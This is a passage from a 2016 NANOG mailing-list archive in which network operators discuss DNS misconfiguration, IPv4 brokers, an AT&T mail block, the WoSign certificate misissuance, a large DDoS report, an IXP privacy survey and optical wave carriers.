<926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <8738.1472597403@turing-police.cc.vt.edu> Message-ID: <20160831002326.GE2696@torea.jnet.net.nz> On Tue, Aug 30, 2016 at 06:50:03PM -0400, Valdis.Kletnieks at vt.edu wrote: > On Tue, 30 Aug 2016 14:39:10 -0700, Owen DeLong said: > > > I run a pair of nameservers. Let???s call them ns1.company.com > > and ns2.company.com > > > Someone registers example.com and points NS records in the COM zone at my > > nameservers. > > I would have expected that the resulting NXDOMAIN replies from ns1 and ns2 > would usually make this a self-correcting problem. > > Are there actually people who do this misconfiguration on a zone big enough > for the traffic to matter, and leave it that way for very long before they > clue in that things aren't working right? I'd think that if somebody points > billy-bobs-bait-tackle-and-internet.com at you, it might take you quite some > time to notice - and if somebody whoopsies and points ebay.com's NS records > at you, the resulting disfunction would be noticed fairly soon.... The recent example seems to be Digital Ocean who had 20k domains pointed at their NS servers that weren't configured by customers. There is a bit about it at https://thehackerblog.com/floating-domains-taking-over-20k-digitalocean-domains-via-a-lax-domain-import-system/index.html that may be interesting to read. I disagree with some of the analysis but it's a reasonable insight into the frequency of this. > > (Miscreants who do this intentionally are, of course, a totally different > kettle of fish, and need to be dealt with as micreants....) From cb.list6 at gmail.com Wed Aug 31 13:04:21 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 31 Aug 2016 06:04:21 -0700 Subject: IPv4 Broker In-Reply-To: References: Message-ID: Check the archive, this issue has been covered Also, if you need a ddos scrubber that will fail when your uplink is saturated, that info is in the archives too On Tuesday, August 30, 2016, Lorenzo Mainardi < lorenzo.mainardi at digitelitalia.com> wrote: > Do you know any good IPv4 broker? > I need a /20. > Regards > > > > From niels=nanog at bakker.net Wed Aug 31 14:18:27 2016 From: niels=nanog at bakker.net (Niels Bakker) Date: Wed, 31 Aug 2016 16:18:27 +0200 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <2171203D-A70B-415D-B0A5-192591DF0575@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <8738.1472597403@turing-police.cc.vt.edu> <2171203D-A70B-415D-B0A5-192591DF0575@delong.com> Message-ID: <20160831141827.GG3955@excession.tpb.net> * owen at delong.com (Owen DeLong) [Wed 31 Aug 2016, 01:47 CEST]: >You don?t get NXDOMAIN when a nameserver gets a request for a zone >it doesn?t serve. Correct in most cases (there's an edge case where a server is [mis] configured as authoritative with its own empty . and its regular zones and allows global querying; it's similar to asking a root server for anything in a nonexistent TLD). >You either get SERVFAIL or you get NS records back as a referral. Or REFUSED. -- Niels. From jayfar at jayfar.com Wed Aug 31 14:41:24 2016 From: jayfar at jayfar.com (Jay Farrell) Date: Wed, 31 Aug 2016 10:41:24 -0400 Subject: Need abuse/postmaster contact for AT&T to resolve IP block In-Reply-To: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> References: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> Message-ID: Interestingly, your mail to the nanog list went to my spam folder, rather than my nanog folder (I'm using gmail or domains for my mail.) That rarely happens. On Tue, Aug 30, 2016 at 9:22 AM, Webhosting.net Admin wrote: > A few of our exchange IPs get blocked intermittently, but only by ATT. Ips > are clean, no issues, we?re diligent about finding and fixing these types > of issues as it has a large impact. > > It would be very helpful to know why the IP below got blocked so we can > find and fix the problem to prevent further listing. We have a few ips in > rotation and some have no issue. It?s a ?blind? listing, so we only find > out about it when customers complain that they getting blocked. > > ff-ip4-mx-vip1.prodigy.net # 5.3.0 flph399 DNSBL:ATTRBL 521< 67.215.167.170 >_is_blocked.__For_ > information_see_http://att.net/blocks> #SMTP# > > Any info/help would be most helpful. > > Many thanks, > > Webhosting.net Postmaster > > > > > > > From trelane at trelane.net Wed Aug 31 14:50:44 2016 From: trelane at trelane.net (Andrew Kirch) Date: Wed, 31 Aug 2016 10:50:44 -0400 Subject: Need abuse/postmaster contact for AT&T to resolve IP block In-Reply-To: References: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> Message-ID: Gmail here, went to my Inbox. On Wed, Aug 31, 2016 at 10:41 AM, Jay Farrell via NANOG wrote: > Interestingly, your mail to the nanog list went to my spam folder, rather > than my nanog folder (I'm using gmail or domains for my mail.) That rarely > happens. > > On Tue, Aug 30, 2016 at 9:22 AM, Webhosting.net Admin < > admin at webhosting.net> > wrote: > > > A few of our exchange IPs get blocked intermittently, but only by ATT. > Ips > > are clean, no issues, we?re diligent about finding and fixing these types > > of issues as it has a large impact. > > > > It would be very helpful to know why the IP below got blocked so we can > > find and fix the problem to prevent further listing. We have a few ips in > > rotation and some have no issue. It?s a ?blind? listing, so we only find > > out about it when customers complain that they getting blocked. > > > > ff-ip4-mx-vip1.prodigy.net # > 5.3.0 flph399 DNSBL:ATTRBL 521< 67.215.167.170 >_is_blocked.__For_ > > information_see_http://att.net/blocks> #SMTP# > > > > Any info/help would be most helpful. > > > > Many thanks, > > > > Webhosting.net Postmaster > > > > > > > > > > > > > > > From marco at paesani.it Wed Aug 31 15:23:33 2016 From: marco at paesani.it (Marco Paesani) Date: Wed, 31 Aug 2016 17:23:33 +0200 Subject: IPv4 Broker In-Reply-To: References: Message-ID: Hi Lorenzo, you can see: https://www.ripe.net/manage-ips-and-asns/resource-transfers-and-mergers/ transfers/brokers Ciao, Marco Paesani Skype: mpaesani Mobile: +39 348 6019349 Success depends on the right choice ! Email: marco at paesani.it 2016-08-30 17:43 GMT+02:00 Lorenzo Mainardi < lorenzo.mainardi at digitelitalia.com>: > Do you know any good IPv4 broker? > I need a /20. > Regards > > > > From aaron at heyaaron.com Wed Aug 31 16:12:42 2016 From: aaron at heyaaron.com (Aaron C. de Bruyn) Date: Wed, 31 Aug 2016 09:12:42 -0700 Subject: Need abuse/postmaster contact for AT&T to resolve IP block In-Reply-To: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> References: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> Message-ID: Try posting that to the mailop list. I had been having trouble with att.net for about a month, and I filled out the form at http://att.net/blocks/ 3 times with no response. I posted to mailop a few days ago and they resolved the issue within an hour. ...then a few days later I received the response to the form that my IP had already been unblocked. Even though they say they will get back to you within 2-3 days, it's more like 10-14. -A On Tue, Aug 30, 2016 at 6:22 AM, Webhosting.net Admin wrote: > A few of our exchange IPs get blocked intermittently, but only by ATT. Ips > are clean, no issues, we?re diligent about finding and fixing these types > of issues as it has a large impact. > > It would be very helpful to know why the IP below got blocked so we can > find and fix the problem to prevent further listing. We have a few ips in > rotation and some have no issue. It?s a ?blind? listing, so we only find > out about it when customers complain that they getting blocked. > > ff-ip4-mx-vip1.prodigy.net # 5.3.0 flph399 DNSBL:ATTRBL 521< 67.215.167.170 >_is_blocked.__For_ > information_see_http://att.net/blocks> #SMTP# > > Any info/help would be most helpful. > > Many thanks, > > Webhosting.net Postmaster > > > > > > > From royce at techsolvency.com Wed Aug 31 18:45:48 2016 From: royce at techsolvency.com (Royce Williams) Date: Wed, 31 Aug 2016 10:45:48 -0800 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: Message-ID: On Tue, Aug 30, 2016 at 9:11 PM, Royce Williams wrote: > On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke wrote: >> >> http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html >> >> One of the largest Chinese root certificate authority WoSign issued many >> fake certificates due to an vulnerability. WoSign's free certificate >> service allowed its users to get a certificate for the base domain if they >> were able to prove control of a subdomain. This means that if you can >> control a subdomain of a major website, say percy.github.io, you're able to >> obtain a certificate by WoSign for github.io, taking control over the >> entire domain. > > > And there is now strong circumstantial evidence that WoSign now owns - > or at least, directly controls - StartCom: > > https://www.letsphish.org/?part=about > > There are mixed signals of incompetence and deliberate action here. Hypothetically, it would be an interesting strategy for a CA to publicly demonstrate this level of competence: https://www.schrauger.com/the-story-of-how-wosign-gave-me-an-ssl-certificate-for-github-com ... while at the same time taking over another large install base like StartSSL's (an install base fueled by offering free certs). If one got caught doing something naughty, one could buy time by A) playing the incompetence card a few times, and B) having a large enough deployment that it becomes non-trivial for the browsers/OSes to revoke you outright. I'm oversimplifying, as I do not yet actually grok the WoSign <-> StartCom cert trust relationship - but the individual components are ... interesting. Also, this is a cautionary tale about certificate diversity. Because of relative issuer stability, orgs have had the luxury of depending wholly on a single cert supplier. The risk/continuity folks might want to model some "one of our major certificate issuers just got globally revoked" scenarios - if they haven't already. (Side note: compromises in the global trust ecosystem play a fascinating part in Vinge's 2007 Hugo-winning "Rainbows End" - a great read). Royce From infinityape at gmail.com Wed Aug 31 19:37:12 2016 From: infinityape at gmail.com (Dennis B) Date: Wed, 31 Aug 2016 15:37:12 -0400 Subject: Arbor Reports 540Gbps "Sustained" Attack Message-ID: https://www.arbornetworks.com/blog/asert/rio-olympics-take-gold-540gbsec-sustained-ddos-attacks/ I've used SP Peakflow before and I have my opinions. With all the intelligence out there about DDoS attacks, DDoS attackers, DDoS tools and techniques this article leaves me with ton's of questions. IE: What industry was the attack target? Was it a single customer or multiple customers at the same time? What was the attack vector? Was it multi-vector? What was the duration of the 540Gbps attack? Did you actually block the attack or did you just report on it from your cloud signaling alliance aka cloud offering? Could you help explain if the peak of the attack lasted X minutes, Y hours, Z days? What was the attack targeted protocol? Was it TCP against TCP or UDP against UDP or UDP against TCP? I have to be honest, IDK if Arbor is attempting to claim the largest recorded DDoS attack in the world cup of DDoS attacks but the fact that your a local appliance shop. Selling to the global 100 and T1-3 ISPs - I'd hope for more than a marketing ploy to take the top attack vector. Thought I'd ask Nanog if they heard any whispers about this "white buffalo", which ISPs were Transiting the event, what course of actions were taken. Thanks! From hannigan at gmail.com Wed Aug 31 21:26:58 2016 From: hannigan at gmail.com (Martin Hannigan) Date: Wed, 31 Aug 2016 17:26:58 -0400 Subject: IPv4 Broker In-Reply-To: References: Message-ID: Hi Lorenzo, You can obtain a last /22 from the RIPE region as long as you comply with their policy, yes, even if you are "in" the United States. http://bit.ly/RIPE22-20160831 That reduces your need and spend, unless you already received it. Then use the link Marco posted. It's a good list. And reference the archives as Cameron noted. Best Regards, -M< On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi wrote: > Do you know any good IPv4 broker? > I need a /20. > Regards > > > From duga95 at gmail.com Wed Aug 31 21:37:21 2016 From: duga95 at gmail.com (Julien) Date: Wed, 31 Aug 2016 16:37:21 -0500 Subject: IPv4 Broker In-Reply-To: References: Message-ID: Hi, Just worked with couple of those in the RIPE list. Giving you the name off list might be better. If you don?t have yet anything from RIPE or APNIC, you can get a /22. You?ll have, at least, to subscribe as an LIR and pay the fees. It will be much less expensive than buying with a broker. You?ll still have the Geo Localisation issue if you want to use it in US. Julien. > On Aug 31, 2016, at 4:26 PM, Martin Hannigan wrote: > > Hi Lorenzo, > > You can obtain a last /22 from the RIPE region as long as you comply > with their policy, yes, even if you are "in" the United States. > > http://bit.ly/RIPE22-20160831 > > That reduces your need and spend, unless you already received it. > > Then use the link Marco posted. It's a good list. > > And reference the archives as Cameron noted. > > > Best Regards, > > -M< > > > > On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi > wrote: >> Do you know any good IPv4 broker? >> I need a /20. >> Regards >> >> >> From duga95 at gmail.com Wed Aug 31 21:46:38 2016 From: duga95 at gmail.com (Julien) Date: Wed, 31 Aug 2016 16:46:38 -0500 Subject: IPv4 Broker In-Reply-To: References: Message-ID: <26D0E6B0-5A17-47E2-AFAB-544E3983334A@gmail.com> Between this two region it should be possible. For sure, you can?t with a RIPE block as it?s not allowed to transfer from / to RIPE. Julien. > On Aug 31, 2016, at 4:43 PM, Tyler Conrad wrote: > > Is there a way to fix the geolocation on a JPNIC netblock being advertised in the US market short of transferring the ownership of the record to an ARIN ASN? > > On Wed, Aug 31, 2016 at 2:37 PM, Julien > wrote: > Hi, > > Just worked with couple of those in the RIPE list. > Giving you the name off list might be better. > > If you don?t have yet anything from RIPE or APNIC, you can get a /22. > You?ll have, at least, to subscribe as an LIR and pay the fees. > It will be much less expensive than buying with a broker. > You?ll still have the Geo Localisation issue if you want to use it in US. > > Julien. > > > > > On Aug 31, 2016, at 4:26 PM, Martin Hannigan > wrote: > > > > Hi Lorenzo, > > > > You can obtain a last /22 from the RIPE region as long as you comply > > with their policy, yes, even if you are "in" the United States. > > > > http://bit.ly/RIPE22-20160831 > > > > That reduces your need and spend, unless you already received it. > > > > Then use the link Marco posted. It's a good list. > > > > And reference the archives as Cameron noted. > > > > > > Best Regards, > > > > -M< > > > > > > > > On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi > > > wrote: > >> Do you know any good IPv4 broker? > >> I need a /20. > >> Regards > >> > >> > >> > > From tyler at tgconrad.com Wed Aug 31 21:43:35 2016 From: tyler at tgconrad.com (Tyler Conrad) Date: Wed, 31 Aug 2016 14:43:35 -0700 Subject: IPv4 Broker In-Reply-To: References: Message-ID: Is there a way to fix the geolocation on a JPNIC netblock being advertised in the US market short of transferring the ownership of the record to an ARIN ASN? On Wed, Aug 31, 2016 at 2:37 PM, Julien wrote: > Hi, > > Just worked with couple of those in the RIPE list. > Giving you the name off list might be better. > > If you don?t have yet anything from RIPE or APNIC, you can get a /22. > You?ll have, at least, to subscribe as an LIR and pay the fees. > It will be much less expensive than buying with a broker. > You?ll still have the Geo Localisation issue if you want to use it in US. > > Julien. > > > > > On Aug 31, 2016, at 4:26 PM, Martin Hannigan wrote: > > > > Hi Lorenzo, > > > > You can obtain a last /22 from the RIPE region as long as you comply > > with their policy, yes, even if you are "in" the United States. > > > > http://bit.ly/RIPE22-20160831 > > > > That reduces your need and spend, unless you already received it. > > > > Then use the link Marco posted. It's a good list. > > > > And reference the archives as Cameron noted. > > > > > > Best Regards, > > > > -M< > > > > > > > > On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi > > wrote: > >> Do you know any good IPv4 broker? > >> I need a /20. > >> Regards > >> > >> > >> > > From mar.chiesa at gmail.com Wed Aug 31 21:25:40 2016 From: mar.chiesa at gmail.com (Marco Chiesa) Date: Wed, 31 Aug 2016 23:25:40 +0200 Subject: routing at IXPs privacy survey Message-ID: Hi all, as part of our academic effort to devise more powerful routing services at Internet eXchange Points (IXPs), we aim to understand the privacy considerations of network operators in the context of peering with other networks, in general, and at IXPs in particular. We created a short survey for gathering some real-world operational information and we need help from you - network operators - to fill it. The survey will take less than 5 minutes. Link to the survey: http://goo.gl/1e7cDG The survey is fully anonymized (unless you explicitly choose to reveal your identity) and the resulting data analysis will only be presented via aggregate statistics and in an anonymized format. We look forward to receiving your responses! You can find more information, including a short paper about our current research work, on our website: http://six-pack.bitbucket.org/ Thanks for your help, Marco Chiesa (UC Louvain), Marco Canini (UC Louvain), Daniel Demmler (TU Darmstadt), Michael Schapira (Hebrew University of Jerusalem) & Thomas Schneider (TU Darmstadt) From tim at 29lagrange.com Wed Aug 31 23:08:04 2016 From: tim at 29lagrange.com (tim at 29lagrange.com) Date: Wed, 31 Aug 2016 19:08:04 -0400 Subject: Optical Wave Providers Message-ID: I have been looking at optical wave carriers for some long haul 1G/10G across the US. All to major cities and well known POP's. I am finding that there are not a lot of carriers who are offering wave services, usually just ethernet/MPLS. Particularly across the North west. Can someone shed some light on who some of the bigger carriers are and any challenges you have encountered with services like this? Who actually owns the fiber across the US? Thanks Tim